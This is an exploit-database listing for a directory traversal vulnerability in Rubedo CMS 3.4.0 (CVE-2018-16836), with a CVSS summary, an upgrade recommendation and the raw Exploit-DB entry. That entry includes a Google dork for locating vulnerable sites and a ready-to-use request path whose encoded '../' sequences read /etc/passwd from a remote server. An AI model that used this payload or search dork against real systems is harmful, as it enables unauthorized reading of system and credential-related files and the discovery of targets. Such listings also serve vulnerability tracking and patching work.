header-logo
Suggest Exploit
vendor:
Rubedo CMS
by:
Marouene Boubakri
9.8
CVSS
CRITICAL
Directory Traversal
22
CWE
Product Name: Rubedo CMS
Affected Version From: 3.4.0
Affected Version To: 3.4.0
Patch Exists: YES
Related CWE: CVE-2018-16836
CPE: a:rubedo_project:rubedo_cms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2018

Rubedo CMS 3.4.0 – Directory Traversal

A directory traversal vulnerability exists in Rubedo CMS 3.4.0 which allows an attacker to read the /etc/passwd file from a remote server by sending a specially crafted request.

Mitigation:

Upgrade to the latest version of Rubedo CMS to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836

# PoC:
# Read /etc/passwd file from remote server

/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'

Navigation

Suggest Exploit

Services By CQR